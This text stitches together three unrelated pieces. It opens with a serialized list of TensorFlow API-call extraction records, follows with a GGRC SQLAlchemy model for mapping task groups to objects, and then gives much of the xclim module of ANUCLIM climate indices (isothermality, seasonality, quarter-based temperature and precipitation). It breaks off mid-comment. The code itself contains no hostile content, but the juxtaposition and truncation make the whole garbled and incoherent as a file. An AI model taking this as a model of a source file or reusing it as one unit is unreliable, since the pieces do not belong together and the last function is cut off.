'tf.reduce_sum', (['(kernel * inputs)', '[3]'], {'keep_dims': '(False)'}), '(kernel * inputs, [3], keep_dims=False)\n', (17129, 17168), True, 'import tensorflow as tf\n'), ((17885, 17928), 'tensorflow.gather', 'tf.gather', (['ground_truth_x', 'ground_truth_idx'], {}), '(ground_truth_x, ground_truth_idx)\n', (17894, 17928), True, 'import tensorflow as tf\n'), ((17950, 17987), 'tensorflow.gather', 'tf.gather', (['generated_x', 'generated_idx'], {}), '(generated_x, generated_idx)\n', (17959, 17987), True, 'import tensorflow as tf\n'), ((17997, 18094), 'tensorflow.dynamic_stitch', 'tf.dynamic_stitch', (['[ground_truth_idx, generated_idx]', '[ground_truth_examps, generated_examps]'], {}), '([ground_truth_idx, generated_idx], [ground_truth_examps,\n 
generated_examps])\n', (18014, 18094), True, 'import tensorflow as tf\n'), ((2297, 2339), 'tensorflow.contrib.slim.arg_scope', 'slim.arg_scope', (['[slim.conv2d]'], {'reuse': '(False)'}), '([slim.conv2d], reuse=False)\n', (2311, 2339), True, 'import tensorflow.contrib.slim as slim\n'), ((2362, 2382), 'tensorflow.concat', 'tf.concat', (['images', '(3)'], {}), '(images, 3)\n', (2371, 2382), True, 'import tensorflow as tf\n'), ((2402, 2562), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['stacked_images', '(32)', '[3, 3]'], {'stride': '(2)', 'scope': '"""latent_conv1"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_norm1'}"}), "(stacked_images, 32, [3, 3], stride=2, scope='latent_conv1',\n normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope':\n 'latent_norm1'})\n", (2413, 2562), True, 'import tensorflow.contrib.slim as slim\n'), ((2623, 2780), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['latent_enc1', '(64)', '[3, 3]'], {'stride': '(2)', 'scope': '"""latent_conv2"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_norm2'}"}), "(latent_enc1, 64, [3, 3], stride=2, scope='latent_conv2',\n normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope':\n 'latent_norm2'})\n", (2634, 2780), True, 'import tensorflow.contrib.slim as slim\n'), ((2841, 2998), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['latent_enc2', '(64)', '[3, 3]'], {'stride': '(1)', 'scope': '"""latent_conv3"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_norm3'}"}), "(latent_enc2, 64, [3, 3], stride=1, scope='latent_conv3',\n normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope':\n 'latent_norm3'})\n", (2852, 2998), True, 'import tensorflow.contrib.slim as slim\n'), ((3059, 3259), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['latent_enc3', 'FLAGS.latent_channels', '[3, 3]'], {'stride': '(2)', 'activation_fn': 'None', 'scope': '"""latent_mean"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_norm_mean'}"}), "(latent_enc3, FLAGS.latent_channels, [3, 3], stride=2,\n activation_fn=None, scope='latent_mean', normalizer_fn=tf_layers.\n layer_norm, normalizer_params={'scope': 'latent_norm_mean'})\n", (3070, 3259), True, 'import tensorflow.contrib.slim as slim\n'), ((3326, 3505), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['latent_enc3', 'FLAGS.latent_channels', '[3, 3]'], {'stride': '(2)', 'scope': '"""latent_std"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_std_norm'}"}), "(latent_enc3, FLAGS.latent_channels, [3, 3], stride=2, scope=\n 'latent_std', normalizer_fn=tf_layers.layer_norm, normalizer_params={\n 'scope': 'latent_std_norm'})\n", (3337, 3505), True, 'import tensorflow.contrib.slim as slim\n'), ((3660, 3686), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['divergence'], {}), '(divergence)\n', (3674, 3686), True, 'import tensorflow as tf\n'), ((3769, 3862), 'tensorflow.random_normal', 'tf.random_normal', (['([FLAGS.sequence_length - 1] + latent_mean.shape)', '(0)', '(1)'], {'dtype': 'tf.float32'}), '([FLAGS.sequence_length - 1] + latent_mean.shape, 0, 1,\n dtype=tf.float32)\n', (3785, 3862), True, 'import tensorflow as tf\n'), ((3927, 3986), 'tensorflow.random_normal', 'tf.random_normal', (['latent_mean.shape', '(0)', '(1)'], {'dtype': 'tf.float32'}), '(latent_mean.shape, 0, 1, dtype=tf.float32)\n', (3943, 3986), True, 'import tensorflow as tf\n'), ((5811, 5829), 'tensorflow.identity', 'tf.identity', 
(['image'], {}), '(image)\n', (5822, 5829), True, 'import tensorflow as tf\n'), ((6488, 6527), 'numpy.array', 'np.array', (['[32, 32, 64, 64, 128, 64, 32]'], {}), '([32, 32, 64, 64, 128, 64, 32])\n', (6496, 6527), True, 'import numpy as np\n'), ((13722, 13774), 'numpy.array', 'np.array', (['[1.0, 0.0, 0.0, 0.0, 1.0, 0.0]', 'np.float32'], {}), '([1.0, 0.0, 0.0, 0.0, 1.0, 0.0], np.float32)\n', (13730, 13774), True, 'import numpy as np\n'), ((15047, 15082), 'tensorflow.nn.relu', 'tf.nn.relu', (['(cdna_kerns - RELU_SHIFT)'], {}), '(cdna_kerns - RELU_SHIFT)\n', (15057, 15082), True, 'import tensorflow as tf\n'), ((16957, 16991), 'tensorflow.nn.relu', 'tf.nn.relu', (['(dna_input - RELU_SHIFT)'], {}), '(dna_input - RELU_SHIFT)\n', (16967, 16991), True, 'import tensorflow as tf\n'), ((17754, 17780), 'tensorflow.range', 'tf.range', (['num_ground_truth'], {}), '(num_ground_truth)\n', (17762, 17780), True, 'import tensorflow as tf\n'), ((7085, 7230), 'tensorflow.contrib.slim.arg_scope', 'slim.arg_scope', (['[lstm_func, slim.layers.conv2d, slim.layers.fully_connected, tf_layers.\n layer_norm, slim.layers.conv2d_transpose]'], {'reuse': 'reuse'}), '([lstm_func, slim.layers.conv2d, slim.layers.fully_connected,\n tf_layers.layer_norm, slim.layers.conv2d_transpose], reuse=reuse)\n', (7099, 7230), True, 'import tensorflow.contrib.slim as slim\n'), ((7696, 7745), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(1)', 'values': '[action, current_state]'}), '(axis=1, values=[action, current_state])\n', (7705, 7745), True, 'import tensorflow as tf\n'), ((7760, 7922), 'tensorflow.contrib.slim.layers.conv2d', 'slim.layers.conv2d', (['prev_image', '(32)', '[5, 5]'], {'stride': '(2)', 'scope': '"""scale1_conv1"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'layer_norm1'}"}), "(prev_image, 32, [5, 5], stride=2, scope='scale1_conv1',\n normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope':\n 'layer_norm1'})\n", (7778, 7922), True, 'import tensorflow.contrib.slim as slim\n'), ((8092, 8142), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden1'], {'scope': '"""layer_norm2"""'}), "(hidden1, scope='layer_norm2')\n", (8112, 8142), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((8261, 8311), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden2'], {'scope': '"""layer_norm3"""'}), "(hidden2, scope='layer_norm3')\n", (8281, 8311), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((8537, 8587), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden3'], {'scope': '"""layer_norm4"""'}), "(hidden3, scope='layer_norm4')\n", (8557, 8587), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((8706, 8756), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden4'], {'scope': '"""layer_norm5"""'}), "(hidden4, scope='layer_norm5')\n", (8726, 8756), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((9935, 9985), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden5'], {'scope': '"""layer_norm6"""'}), "(hidden5, scope='layer_norm6')\n", (9955, 9985), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((10226, 10276), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden6'], {'scope': '"""layer_norm7"""'}), "(hidden6, scope='layer_norm7')\n", (10246, 10276), 
True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((10318, 10359), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': '[hidden6, enc1]'}), '(axis=3, values=[hidden6, enc1])\n', (10327, 10359), True, 'import tensorflow as tf\n'), ((10614, 10664), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden7'], {'scope': '"""layer_norm8"""'}), "(hidden7, scope='layer_norm8')\n", (10634, 10664), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((10707, 10748), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': '[hidden7, enc0]'}), '(axis=3, values=[hidden7, enc0])\n', (10716, 10748), True, 'import tensorflow as tf\n'), ((12360, 12463), 'tensorflow.contrib.slim.layers.conv2d_transpose', 'slim.layers.conv2d_transpose', (['enc6', '(num_masks + 1)', '(1)'], {'stride': '(1)', 'scope': '"""convt7"""', 'activation_fn': 'None'}), "(enc6, num_masks + 1, 1, stride=1, scope=\n 'convt7', activation_fn=None)\n", (12388, 12463), True, 'import tensorflow.contrib.slim as slim\n'), ((12656, 12719), 'tensorflow.split', 'tf.split', ([], {'axis': '(3)', 'num_or_size_splits': '(num_masks + 1)', 'value': 'masks'}), '(axis=3, num_or_size_splits=num_masks + 1, value=masks)\n', (12664, 12719), True, 'import tensorflow as tf\n'), ((13990, 14021), 'spatial_transformer.transformer', 'transformer', (['prev_image', 'params'], {}), '(prev_image, params)\n', (14001, 14021), False, 'from spatial_transformer import transformer\n'), ((17047, 17089), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['kernel', '[3]'], {'keep_dims': '(True)'}), '(kernel, [3], keep_dims=True)\n', (17060, 17089), True, 'import tensorflow as tf\n'), ((1452, 1469), 'tensorflow.exp', 'tf.exp', (['log_sigma'], {}), '(log_sigma)\n', (1458, 1469), True, 'import tensorflow as tf\n'), ((9155, 9194), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': '[enc2, smear]'}), '(axis=3, values=[enc2, smear])\n', (9164, 9194), True, 'import tensorflow as tf\n'), ((11112, 11220), 'tensorflow.contrib.slim.layers.conv2d_transpose', 'slim.layers.conv2d_transpose', (['enc6', '(DNA_KERN_SIZE ** 2)', '(1)'], {'stride': '(1)', 'scope': '"""convt4"""', 'activation_fn': 'None'}), "(enc6, DNA_KERN_SIZE ** 2, 1, stride=1, scope=\n 'convt4', activation_fn=None)\n", (11140, 11220), True, 'import tensorflow.contrib.slim as slim\n'), ((11325, 11429), 'tensorflow.contrib.slim.layers.conv2d_transpose', 'slim.layers.conv2d_transpose', (['enc6', 'color_channels', '(1)'], {'stride': '(1)', 'scope': '"""convt4"""', 'activation_fn': 'None'}), "(enc6, color_channels, 1, stride=1, scope=\n 'convt4', activation_fn=None)\n", (11353, 11429), True, 'import tensorflow.contrib.slim as slim\n'), ((11728, 11788), 'tensorflow.contrib.slim.layers.fully_connected', 'slim.layers.fully_connected', (['stp_input0', '(100)'], {'scope': '"""fc_stp"""'}), "(stp_input0, 100, scope='fc_stp')\n", (11755, 11788), True, 'import tensorflow.contrib.slim as slim\n'), ((1436, 1449), 'tensorflow.square', 'tf.square', (['mu'], {}), '(mu)\n', (1445, 1449), True, 'import tensorflow as tf\n'), ((6349, 6372), 'tensorflow.to_float', 'tf.to_float', (['batch_size'], {}), '(batch_size)\n', (6360, 6372), True, 'import tensorflow as tf\n'), ((9611, 9644), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['[latent]'], {}), '([latent])\n', (9634, 9644), True, 'import tensorflow as tf\n'), ((9663, 9691), 'tensorflow.concat', 'tf.concat', (['[enc2, latent]', '(3)'], {}), '([enc2, latent], 3)\n', (9672, 
9691), True, 'import tensorflow as tf\n'), ((11607, 11626), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', (['enc7'], {}), '(enc7)\n', (11620, 11626), True, 'import tensorflow as tf\n'), ((12520, 12558), 'tensorflow.reshape', 'tf.reshape', (['masks', '[-1, num_masks + 1]'], {}), '(masks, [-1, num_masks + 1])\n', (12530, 12558), True, 'import tensorflow as tf\n'), ((16758, 16845), 'tensorflow.slice', 'tf.slice', (['prev_image_pad', '[0, xkern, ykern, 0]', '[-1, image_height, image_width, -1]'], {}), '(prev_image_pad, [0, xkern, ykern, 0], [-1, image_height,\n image_width, -1])\n', (16766, 16845), True, 'import tensorflow as tf\n'), ((6385, 6405), 'tensorflow.exp', 'tf.exp', (['(iter_num / k)'], {}), '(iter_num / k)\n', (6391, 6405), True, 'import tensorflow as tf\n'), ((9493, 9512), 'tensorflow.identity', 'tf.identity', (['latent'], {}), '(latent)\n', (9504, 9512), True, 'import tensorflow as tf\n'), ((9563, 9587), 'tensorflow.exp', 'tf.exp', (['(latent_std / 2.0)'], {}), '(latent_std / 2.0)\n', (9569, 9587), True, 'import tensorflow as tf\n')] |
# Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: <EMAIL>
# Maintained By: <EMAIL>
from sqlalchemy.ext.associationproxy import association_proxy
from ggrc import db
from ggrc.models.mixins import Mapping
from ggrc.models.mixins import Timeboxed
from ggrc.models.reflection import PublishOnly
class TaskGroupObject(Timeboxed, Mapping, db.Model):
__tablename__ = 'task_group_objects'
task_group_id = db.Column(
db.Integer, db.ForeignKey('task_groups.id'), nullable=False)
object_id = db.Column(db.Integer, nullable=False)
object_type = db.Column(db.String, nullable=False)
@property
def object_attr(self):
return '{0}_object'.format(self.object_type)
@property
def object(self):
return getattr(self, self.object_attr)
@object.setter
def object(self, value):
self.object_id = value.id if value is not None else None
self.object_type = value.__class__.__name__ if value is not None \
else None
return setattr(self, self.object_attr, value)
@staticmethod
def _extra_table_args(cls):
return (
db.UniqueConstraint('task_group_id', 'object_id', 'object_type'),
db.Index('ix_task_group_id', 'task_group_id'),
)
_publish_attrs = [
'task_group',
'object',
]
_sanitize_html = []
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(TaskGroupObject, cls).eager_query()
return query.options(
orm.subqueryload('task_group'))
def _display_name(self):
return self.object.display_name + '<->' + self.task_group.display_name
def copy(self, _other=None, **kwargs):
columns = [
'task_group', 'object_id', 'object_type'
]
target = self.copy_into(_other, columns, **kwargs)
return target
class TaskGroupable(object):
@classmethod
def late_init_task_groupable(cls):
def make_task_group_objects(cls):
cls.task_groups = association_proxy(
'task_group_objects', 'task_group',
creator=lambda task_group: TaskGroupObject(
task_group=task_group,
object_type=cls.__name__,
)
)
joinstr = 'and_(foreign(TaskGroupObject.object_id) == {type}.id, '\
'foreign(TaskGroupObject.object_type) == "{type}")'
joinstr = joinstr.format(type=cls.__name__)
return db.relationship(
'TaskGroupObject',
primaryjoin=joinstr,
backref='{0}_object'.format(cls.__name__),
cascade='all, delete-orphan',
)
cls.task_group_objects = make_task_group_objects(cls)
_publish_attrs = [
PublishOnly('task_groups'),
'task_group_objects',
]
_include_links = []
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(TaskGroupable, cls).eager_query()
return cls.eager_inclusions(query, TaskGroupable._include_links).options(
orm.subqueryload('task_group_objects'))
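# Illustrative usage sketch (assumption: `SomeMappableObject` is a hypothetical
# model; mixing in TaskGroupable and calling late_init_task_groupable() wires up
# the `task_groups` association proxy defined above):
#   class SomeMappableObject(TaskGroupable, db.Model):
#       __tablename__ = 'some_mappable_objects'
#   SomeMappableObject.late_init_task_groupable()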
| [
"ggrc.models.reflection.PublishOnly",
"ggrc.db.UniqueConstraint",
"sqlalchemy.orm.subqueryload",
"ggrc.db.Index",
"ggrc.db.ForeignKey",
"ggrc.db.Column"
] | [((621, 658), 'ggrc.db.Column', 'db.Column', (['db.Integer'], {'nullable': '(False)'}), '(db.Integer, nullable=False)\n', (630, 658), False, 'from ggrc import db\n'), ((675, 711), 'ggrc.db.Column', 'db.Column', (['db.String'], {'nullable': '(False)'}), '(db.String, nullable=False)\n', (684, 711), False, 'from ggrc import db\n'), ((558, 589), 'ggrc.db.ForeignKey', 'db.ForeignKey', (['"""task_groups.id"""'], {}), "('task_groups.id')\n", (571, 589), False, 'from ggrc import db\n'), ((2710, 2736), 'ggrc.models.reflection.PublishOnly', 'PublishOnly', (['"""task_groups"""'], {}), "('task_groups')\n", (2721, 2736), False, 'from ggrc.models.reflection import PublishOnly\n'), ((1188, 1252), 'ggrc.db.UniqueConstraint', 'db.UniqueConstraint', (['"""task_group_id"""', '"""object_id"""', '"""object_type"""'], {}), "('task_group_id', 'object_id', 'object_type')\n", (1207, 1252), False, 'from ggrc import db\n'), ((1262, 1307), 'ggrc.db.Index', 'db.Index', (['"""ix_task_group_id"""', '"""task_group_id"""'], {}), "('ix_task_group_id', 'task_group_id')\n", (1270, 1307), False, 'from ggrc import db\n'), ((1559, 1589), 'sqlalchemy.orm.subqueryload', 'orm.subqueryload', (['"""task_group"""'], {}), "('task_group')\n", (1575, 1589), False, 'from sqlalchemy import orm\n'), ((3003, 3041), 'sqlalchemy.orm.subqueryload', 'orm.subqueryload', (['"""task_group_objects"""'], {}), "('task_group_objects')\n", (3019, 3041), False, 'from sqlalchemy import orm\n')] |
# noqa: D100
from typing import Optional
import numpy as np
import xarray
from xclim.core.units import (
convert_units_to,
declare_units,
pint_multiply,
rate2amount,
units,
units2pint,
)
from xclim.core.utils import ensure_chunk_size
from ._multivariate import (
daily_temperature_range,
extreme_temperature_range,
precip_accumulation,
)
from ._simple import tg_mean
from .generic import select_resample_op
from .run_length import lazy_indexing
# Frequencies : YS: year start, QS-DEC: seasons starting in december, MS: month start
# See http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases
# -------------------------------------------------- #
# ATTENTION: ASSUME ALL INDICES WRONG UNTIL TESTED ! #
# -------------------------------------------------- #
__all__ = [
"temperature_seasonality",
"precip_seasonality",
"tg_mean_warmcold_quarter",
"tg_mean_wetdry_quarter",
"prcptot_wetdry_quarter",
"prcptot_warmcold_quarter",
"prcptot",
"prcptot_wetdry_period",
"isothermality",
]
_xr_argops = {
"wettest": xarray.DataArray.argmax,
"warmest": xarray.DataArray.argmax,
"dryest": xarray.DataArray.argmin,
"driest": xarray.DataArray.argmin,
"coldest": xarray.DataArray.argmin,
}
_np_ops = {
"wettest": "max",
"warmest": "max",
"dryest": "min",
"driest": "min",
"coldest": "min",
}
@declare_units(tasmin="[temperature]", tasmax="[temperature]")
def isothermality(
tasmin: xarray.DataArray, tasmax: xarray.DataArray, freq: str = "YS"
) -> xarray.DataArray:
r"""Isothermality.
The mean diurnal range divided by the annual temperature range.
Parameters
----------
tasmin : xarray.DataArray
Average daily minimum temperature at daily, weekly, or monthly frequency.
tasmax : xarray.DataArray
Average daily maximum temperature at daily, weekly, or monthly frequency.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [%]
Isothermality
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the output with input data with daily frequency as well. As such weekly or monthly input values, if desired, should
be calculated prior to calling the function.
"""
dtr = daily_temperature_range(tasmin=tasmin, tasmax=tasmax, freq=freq)
etr = extreme_temperature_range(tasmin=tasmin, tasmax=tasmax, freq=freq)
with xarray.set_options(keep_attrs=True):
iso = dtr / etr * 100
iso.attrs["units"] = "%"
return iso
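# Illustrative usage sketch for `isothermality` (added for clarity; not part of the
# original module). It follows the doctest style used elsewhere in this file and
# assumes `path_to_tasmin_file` / `path_to_tasmax_file` fixtures analogous to
# `path_to_tas_file`:
# >>> import xclim.indices as xci
# >>> tn = xr.open_dataset(path_to_tasmin_file).tasmin
# >>> tx = xr.open_dataset(path_to_tasmax_file).tasmax
# >>> iso = xci.isothermality(tasmin=tn, tasmax=tx, freq="YS")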
@declare_units(tas="[temperature]")
def temperature_seasonality(tas: xarray.DataArray) -> xarray.DataArray:
r"""ANUCLIM temperature seasonality (coefficient of variation).
The annual temperature coefficient of variation expressed in percent. Calculated as the standard deviation
of temperature values for a given year expressed as a percentage of the mean of those temperatures.
Parameters
----------
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
Returns
-------
xarray.DataArray, [%]
Mean temperature coefficient of variation
Examples
--------
The following would compute for each grid cell of file `tas.day.nc` the annual temperature seasonality:
>>> import xclim.indices as xci
>>> t = xr.open_dataset(path_to_tas_file).tas
>>> tday_seasonality = xci.temperature_seasonality(t)
>>> t_weekly = xci.tg_mean(t, freq='7D')
>>> tweek_seasonality = xci.temperature_seasonality(t_weekly)
Notes
-----
For this calculation, the mean in degrees Kelvin is used. This avoids the possibility of having to
divide by zero, but it does mean that the values are usually quite small.
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be
calculated prior to calling the function.
"""
tas = convert_units_to(tas, "K")
with xarray.set_options(keep_attrs=True):
seas = 100 * _anuclim_coeff_var(tas)
seas.attrs["units"] = "%"
return seas
@declare_units(pr="[precipitation]")
def precip_seasonality(
pr: xarray.DataArray,
) -> xarray.DataArray:
r"""ANUCLIM Precipitation Seasonality (C of V).
The annual precipitation Coefficient of Variation (C of V) expressed in percent. Calculated as the standard deviation
of precipitation values for a given year expressed as a percentage of the mean of those values.
Parameters
----------
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
Units need to be defined as a rate (e.g. mm d-1, mm week-1).
Returns
-------
xarray.DataArray, [%]
Precipitation coefficient of variation
Examples
--------
The following would compute for each grid cell of file `pr.day.nc` the annual precipitation seasonality:
>>> import xclim.indices as xci
>>> p = xr.open_dataset(path_to_pr_file).pr
>>> pday_seasonality = xci.precip_seasonality(p)
>>> p_weekly = xci.precip_accumulation(p, freq='7D')
# Input units need to be a rate
>>> p_weekly.attrs['units'] = "mm/week"
>>> pweek_seasonality = xci.precip_seasonality(p_weekly)
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
If input units are in mm s-1 (or equivalent) values are converted to mm/day to avoid potentially small denominator
values.
"""
# If units in mm/sec convert to mm/days to avoid potentially small denominator
if units2pint(pr) == units("mm / s"):
pr = convert_units_to(pr, "mm d-1")
with xarray.set_options(keep_attrs=True):
seas = 100 * _anuclim_coeff_var(pr)
seas.attrs["units"] = "%"
return seas
@declare_units(tas="[temperature]")
def tg_mean_warmcold_quarter(
tas: xarray.DataArray,
op: str = None,
src_timestep: str = None,
freq: str = "YS",
) -> xarray.DataArray:
r"""ANUCLIM Mean temperature of warmest/coldest quarter.
The warmest (or coldest) quarter of the year is determined, and the mean temperature of this period is
calculated. If the input data frequency is daily ("D") or weekly ("W"), quarters are defined as 13 week periods,
otherwise as 3 months.
Parameters
----------
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
op : str {'warmest', 'coldest'}
Operation to perform: 'warmest' calculate warmest quarter; 'coldest' calculate coldest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [same as tas]
        Mean temperature values of the {op} quarter of each year.
Examples
--------
The following would compute for each grid cell of file `tas.day.nc` the annual temperature
warmest quarter mean temperature:
>>> import xclim.indices as xci
>>> t = xr.open_dataset(path_to_tas_file)
>>> t_warm_qrt = xci.tg_mean_warmcold_quarter(tas=t.tas, op='warmest', src_timestep='daily')
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
out = _to_quarter(src_timestep, tas=tas)
oper = _np_ops[op]
out = select_resample_op(out, oper, freq)
out.attrs["units"] = tas.units
return out
@declare_units(tas="[temperature]", pr="[precipitation]")
def tg_mean_wetdry_quarter(
tas: xarray.DataArray,
pr: xarray.DataArray,
op: str = None,
src_timestep: str = None,
freq: str = "YS",
) -> xarray.DataArray:
r"""ANUCLIM Mean temperature of wettest/driest quarter.
The wettest (or driest) quarter of the year is determined, and the mean temperature of this period is calculated.
    If the input data frequency is daily ("D") or weekly ("W"), quarters are defined as 13 week periods, otherwise as 3 months.
Parameters
----------
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
op : {'wettest', 'driest'}
Operation to perform: 'wettest' calculate for the wettest quarter; 'driest' calculate for the driest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [same as tas]
Mean temperature values of the {op} quarter of each year.
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
tas_qrt = _to_quarter(src_timestep, tas=tas)
pr_qrt = _to_quarter(src_timestep, pr=pr)
xr_op = _xr_argops[op]
with xarray.set_options(keep_attrs=True):
out = _from_other_arg(criteria=pr_qrt, output=tas_qrt, op=xr_op, freq=freq)
out.attrs = tas.attrs
return out
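# Illustrative usage sketch for `tg_mean_wetdry_quarter` (added for clarity; not part
# of the original module). Fixture names follow the doctest examples used elsewhere
# in this file:
# >>> import xclim.indices as xci
# >>> t = xr.open_dataset(path_to_tas_file).tas
# >>> p = xr.open_dataset(path_to_pr_file).pr
# >>> tg_wet_qrt = xci.tg_mean_wetdry_quarter(tas=t, pr=p, op='wettest', src_timestep='D')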
@declare_units(pr="[precipitation]")
def prcptot_wetdry_quarter(
pr: xarray.DataArray, op: str = None, src_timestep: str = None, freq: str = "YS"
) -> xarray.DataArray:
r"""ANUCLIM Total precipitation of wettest/driest quarter.
The wettest (or driest) quarter of the year is determined, and the total precipitation of this
    period is calculated. If the input data frequency is daily ("D") or weekly ("W"), quarters
    are defined as 13 week periods, otherwise as 3 months.
Parameters
----------
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
op : {'wettest', 'driest'}
        Operation to perform: 'wettest' calculate wettest quarter; 'driest' calculate driest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [length]
Total precipitation values of the {op} quarter of each year.
Examples
--------
The following would compute for each grid cell of file `pr.day.nc` the annual wettest quarter total precipitation:
>>> from xclim.indices import prcptot_wetdry_quarter
>>> p = xr.open_dataset(path_to_pr_file)
>>> pr_warm_qrt = prcptot_wetdry_quarter(pr=p.pr, op='wettest', src_timestep='D')
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
# returns mm values
pr_qrt = _to_quarter(src_timestep, pr=pr)
try:
oper = _np_ops[op]
except KeyError:
raise NotImplementedError(
            f'Unknown operation "{op}"; not one of "wettest" or "driest"'
)
out = select_resample_op(pr_qrt, oper, freq)
out.attrs["units"] = pr_qrt.units
return out
@declare_units(pr="[precipitation]", tas="[temperature]")
def prcptot_warmcold_quarter(
pr: xarray.DataArray,
tas: xarray.DataArray,
op: str = None,
src_timestep: str = None,
freq: str = "YS",
) -> xarray.DataArray:
r"""ANUCLIM Total precipitation of warmest/coldest quarter.
The warmest (or coldest) quarter of the year is determined, and the total
    precipitation of this period is calculated. If the input data frequency is daily ("D") or weekly ("W"), quarters
    are defined as 13 week periods, otherwise as 3 months.
Parameters
----------
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
op : {'warmest', 'coldest'}
        Operation to perform: 'warmest' calculate for the warmest quarter; 'coldest' calculate for the coldest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
    xarray.DataArray, [mm]
        Total precipitation values of the {op} quarter of each year.
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
# determine input data frequency
tas_qrt = _to_quarter(src_timestep, tas=tas)
# returns mm values
pr_qrt = _to_quarter(src_timestep, pr=pr)
xr_op = _xr_argops[op]
out = _from_other_arg(criteria=tas_qrt, output=pr_qrt, op=xr_op, freq=freq)
out.attrs = pr_qrt.attrs
return out
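# Illustrative usage sketch for `prcptot_warmcold_quarter` (added for clarity; not part
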